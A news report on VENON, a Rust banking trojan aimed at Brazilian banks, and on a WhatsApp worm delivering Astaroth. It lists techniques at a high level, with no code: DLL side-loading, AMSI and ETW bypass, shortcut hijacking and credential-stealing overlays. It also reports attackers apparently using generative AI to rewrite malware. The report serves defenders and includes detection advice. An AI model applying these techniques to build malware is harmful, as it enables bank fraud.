Cybersecurity researchers have discovered VENON, a sophisticated Rust-based banking trojan targeting Brazilian financial institutions through DLL side-loading and social engineering, marking a shift from traditional Delphi-based malware in Latin America.
Cybersecurity researchers have uncovered a sophisticated new banking malware targeting Brazilian users that represents a significant evolution in Latin American cybercrime. The malware, dubbed VENON by Brazilian cybersecurity company ZenoX, is written in Rust—a departure from the Delphi-based malware families that have dominated the region's threat landscape.
A New Breed of Banking Trojan
VENON exhibits behaviors consistent with established banking trojans like Grandoreiro, Mekotio, and Coyote, particularly in its banking overlay logic, active window monitoring, and shortcut hijacking mechanisms. However, its Rust foundation suggests a more technically sophisticated developer, possibly leveraging generative AI to translate and expand upon existing Latin American banking trojan capabilities.
"The Rust code structure presents patterns suggesting a developer familiar with the capabilities of existing Latin American banking trojans, but who used generative AI to rewrite and expand these functionalities in Rust," ZenoX researchers noted. The malware's development environment revealed references to a Windows machine username "byst4," though the campaign hasn't been attributed to any previously documented group.
Sophisticated Infection Chain
The malware employs a complex distribution method involving DLL side-loading to launch a malicious DLL. Researchers suspect the campaign uses social engineering tactics like ClickFix to trick users into downloading ZIP archives containing the payloads via PowerShell scripts.
Once executed, the DLL performs nine evasion techniques before initiating malicious actions:
- Anti-sandbox checks
- Indirect syscalls
- ETW (Event Tracing for Windows) bypass
- AMSI (Antimalware Scan Interface) bypass
The malware then establishes persistence by retrieving configuration from Google Cloud Storage, installing a scheduled task, and creating a WebSocket connection to its command-and-control server.
Targeted Attack Vectors
Two Visual Basic Script blocks implement a shortcut hijacking mechanism exclusively targeting the Itaú banking application. This component replaces legitimate system shortcuts with tampered versions that redirect victims to attacker-controlled web pages. Notably, the attack includes an uninstall step that can restore shortcuts to their original state, suggesting remote control capabilities for covering tracks.
VENON is equipped to target 33 financial institutions and digital asset platforms. It monitors window titles and active browser domains, activating only when targeted applications or websites are opened to serve fake overlays for credential theft.
Broader Context: WhatsApp-Based Campaigns
The VENON discovery comes amid related campaigns exploiting WhatsApp's ubiquity in Brazil. Threat actors are distributing a worm named SORVEPOTEL through WhatsApp's desktop web version, abusing previously authenticated chats to deliver malicious lures.
"A single WhatsApp message delivered through a hijacked SORVEPOTEL session was sufficient to draw a victim into a multi-stage chain that ultimately resulted in an Astaroth implant running fully in memory," said Blackpoint Cyber researchers. These campaigns combine local automation tooling, unsupervised browser drivers, and user-writable runtimes to establish malware with minimal friction.
Technical Sophistication and Implications
The use of Rust for banking malware represents a notable shift in the Latin American cybercrime ecosystem. Rust's memory safety features and performance characteristics make it an attractive choice for malware developers seeking to evade detection while maintaining sophisticated capabilities.
The malware's architecture demonstrates several advanced features:
- DLL side-loading for initial execution
- Multiple evasion techniques to bypass security controls
- WebSocket-based C2 communication for real-time control
- Configurable targeting of 33 financial institutions
- Shortcut hijacking with remote cleanup capabilities
This development suggests that Latin American cybercrime groups are evolving their technical capabilities, potentially influenced by global malware trends while maintaining their focus on regional financial targets.
Protection and Detection
Organizations and individuals in Brazil should be particularly vigilant about:
- Unexpected ZIP file downloads, especially those delivered through social engineering
- Unusual PowerShell script executions
- Modified desktop shortcuts, particularly for banking applications
- Unexpected WebSocket connections to unknown servers
- Signs of DLL side-loading in process monitoring
Security teams should update their threat intelligence feeds to include VENON's characteristics and implement detection rules for its evasion techniques and communication patterns.
The emergence of VENON underscores the ongoing evolution of banking malware and the need for continuous adaptation in cybersecurity defenses, particularly in regions with high mobile and messaging platform usage rates.
Comments
Please log in or register to join the discussion